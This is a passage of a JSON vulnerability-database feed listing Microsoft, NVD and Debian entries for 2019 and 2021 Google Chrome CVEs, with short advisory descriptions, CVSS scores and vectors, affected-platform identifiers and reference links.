"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:03:56", "type": "mscve", "title": "Chromium CVE-2021-21160: Heap buffer overflow in WebAudio", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-03-04T20:03:56", "id": "MS:CVE-2021-21160", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n\n**This CVE has been reported to be exploited in the wild.**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:04:01", "type": "mscve", "title": "Chromium CVE-2021-21166: Object lifecycle issue in audio", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-04T20:04:01", "id": "MS:CVE-2021-21166", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:33:11", "description": "Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21164", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-12-03T17:11:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21164", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21164", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:33:08", "description": "Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page and a malicious server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21163", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-12-03T16:52:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21163", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21163", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:33:05", "description": "Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21162", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-12-03T16:49:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21162", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:34:02", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21161", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-12-03T17:06:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2021-21161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-07T14:22:36", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21159", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:33:02", "description": "Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21160", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-12-03T17:06:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-10-06T05:47:19", "description": "Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-25T15:15:00", "type": "cve", "title": "CVE-2019-13720", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-10-06T03:03:00", "cpe": ["cpe:/o:opensuse:leap:15.1"], "id": "CVE-2019-13720", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-07T14:22:47", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21166", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-01-25T22:05:12", "description": "Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21164", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21164", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21164", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page and a malicious server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21163", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21163", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21163", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21162", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21162", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21161", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21161", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21159", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21159", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21160", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21160", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T22:05:08", "description": "Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 